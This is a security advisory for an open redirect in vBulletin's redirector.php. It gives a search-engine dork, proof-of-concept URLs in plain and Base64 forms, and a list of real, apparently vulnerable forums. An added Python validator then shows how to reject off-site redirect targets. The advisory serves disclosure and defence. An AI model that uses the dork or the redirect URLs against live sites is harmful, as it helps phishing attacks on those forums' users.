vBulletin redirector 3.x.x & 4.2.x Open Redirect Vulnerability

2018.01.24
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Title: vBulletin 3.x.x & 4.2.x Open Redirect Vulnerability
[+] Date: 2018-01-24
[+] Author: Mostafa Gharzi
[+] Vendor Homepage: www.vBulletin.com
[+] Tested on: Windows 10 & Kali Linux
[+] Vulnerable Parameter: url (GET method)
[+] Vulnerable File:
    /redirector.php?url=
    /redirector.php?do=nodelay&url=
[+] Dorks: inurl:/redirector.php?url= intext:"Powered by vBulletin® Version"

### Notes:
[+] Unvalidated redirect vulnerability in vBulletin 3.x.x and 4.2.x: the application accepts untrusted input and redirects the request to a URL taken from that input without validating it. By pointing the URL at a malicious site, an attacker can launch a phishing attack and steal user credentials.

### POC-I:
[+] http://vB-Forum/redirector.php?url=[URL]
[+] http://vB-Forum/redirector.php?do=nodelay&url=[URL]

### Demo-I:
[+] http://www.alnhdi.net/vb/redirector.php?url=https://www.google.com/
[+] http://hondasquad.com/forum/redirector.php?url=https://google.com/
[+] http://warezhr.org/forum/redirector.php?url=https://google.com/
[+] http://duckload.ws/forum/redirector.php?url=https://google.com/
[+] http://tvoya-stroika.com/redirector.php?url=https://google.com/
[+] http://kadago.de/forum/redirector.php?url=https://google.com/
[+] http://nadi-mahasen.com/vb/redirector.php?do=nodelay&url=https://google.com/

### In some versions the URL is Base64-encoded:
[+] Example: https://www.google.com/ ==> Base64 ==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

### POC-II:
[+] http://vB-Forum/redirector.php?url=[URL encoded with Base64]
[+] http://vB-Forum/redirector.php?do=nodelay&url=[URL encoded with Base64]

### Demo-II:
[+] http://forums.corsairs-harbour.ru/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
[+] http://tune-g.ru/forum/redirector.php?do=nodelay&url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=
[+] http://tune-g.ru/forum/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8=

### Special Thanks:
[+] CertCC.ir
[+] Gucert.ir
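The fix for this class of bug is to validate the redirect target before issuing the redirect. The following is an added example (not vBulletin's own code) of a validator for a redirector.php-style `url` parameter that handles both forms in the advisory, the plain URL and the Base64-encoded URL used by some versions; the `ALLOWED_HOSTS` set is a constructed stand-in for the forum's own host names.

```python
"""Hardened validation for a redirector.php-style ``url`` parameter.

Added example, not vBulletin code. Off-site targets, protocol-relative
forms and non-http(s) schemes are rejected; the caller should then send
the user to the forum index instead of to the supplied value.
"""
import base64
import binascii
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"forum.example.com", "www.forum.example.com"}  # constructed


def decode_param(raw: str, base64_encoded: bool):
    """Return the URL carried by ``url=``, or None if Base64 decoding fails."""
    if not base64_encoded:
        return raw
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None


def safe_redirect_target(raw: str, base64_encoded: bool = False,
                         allowed_hosts=ALLOWED_HOSTS):
    """Return the redirect target only when it stays on an allow-listed host."""
    target = decode_param(raw, base64_encoded)
    if not target or "\r" in target or "\n" in target:
        return None                      # empty, undecodable or header-splitting input
    parts = urlsplit(target)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return None                      # javascript:, data:, ftp:, ...
    if not parts.netloc:
        # Same-site relative path. urlsplit leaves netloc empty for "/\\host",
        # which browsers treat as protocol-relative, so reject it explicitly;
        # "//host" already lands in the absolute-URL branch below.
        if target.startswith("/") and target[1:2] not in ("/", "\\"):
            return target
        return None
    # Absolute URL: .hostname drops userinfo and port and lower-cases the name,
    # so "https://forum.example.com@evil.example/" is compared as evil.example.
    if parts.hostname and parts.hostname.lower() in allowed_hosts:
        return target
    return None
```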

References:

https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
https://cwe.mitre.org/data/definitions/601.html


Copyright 2018, cxsecurity.com

 
